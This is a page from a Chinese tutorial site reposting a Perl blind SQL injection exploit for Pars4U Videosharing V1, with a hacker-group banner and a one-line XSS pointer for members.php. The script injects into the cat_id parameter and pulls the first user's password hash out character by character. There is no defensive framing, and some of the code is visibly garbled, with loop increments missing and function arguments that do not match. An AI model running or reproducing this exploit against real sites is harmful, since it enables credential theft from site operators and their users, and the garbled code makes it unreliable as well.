手机
当前位置:查字典教程网 >网络安全 >Exploit >Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " ################## VIVA ISLAME VIVA ISLAME ####################n";

print " ################## VIVA ISLAME VIVA ISLAME ####################n";

print " ## ##n";

print " ## Pars4u Videosharing V1 Blind SQL Injection Exploit ##n";

print " ## ##n";

print " ## ( categories_portal.php cat_id ) ##n";

print " ## http://pars4u.com/videosharing.html ##n";

print " ## ##n";

print " ## Author: Mr.SQL -(:: SYRIAN HACKERS ::)- ##n";

print " ## EMAIL : SQL(at)HOTMAIL.IT ##n";

print " ## HOME : WwW.PaL-HaCkEr.CoM ##n";

print " ## ##n";

print " ## -((:: !GrE3E3E3E3E3ETZz! ::))- ##n";

print " ## ##n";

print " ## - HaCkEr_EGy - His0k4 - Dark MaSTer - MoHaMaD AL 3rab - ##n";

print " ## - Milw0rM - Ghost Hacker - ##n";

print " ## ##n";

print " ## <<>> MuSliMs HaCkErS <<>> ##n";

print " ## ##n";

print " ## Usage : perl exploit.pl host ##n";

print " ## Example: perl exploit.pl www.host.com / -d 10 ##n";

print " ## ##n";

print " ## Options: ##n";

print " ## -d valid cat_id value ##n";

print " ###############################################################n";

print " ###############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_id = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"u"})

{

$cat_id = $options{"u"};

}

if($options{"d"})

{

$cat_id = $options{"d"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i )

{

my $f = 0;

my $h = 48;

while(!$f && $h <= 57)

{

if(istrue2($host, $path, $cat_id, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

if(!$f)

{

$h = 97;

while(!$f && $h <= 122)

{

if(istrue2($host, $cat_id, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

}

}

print "n[~] Exploiting donen";

sub istrue2

{

my $host = shift;

my $cat_id = shift;

my $i = shift;

my $h = shift; my $ua = LWP::UserAgent->new;

my $query = "http://".$host."categories_portal.php?cat_id=".$cat_id." and (SUBSTRING((SELECT password FROM users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($cat_id{"p"})

{

$ua->proxy('http', "http://".$cat_id{"p"});

} my $resp = $ua->get($query);

my $content = $resp->content;

my $regexp = "1&cat_a"; if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

} #######################

##

##-[[ XSS ]]-

## www.Target.com/members.php?PageNo= [[ XSS ]]

##

#######################

【Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit】相关文章:

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

精品推荐
分类导航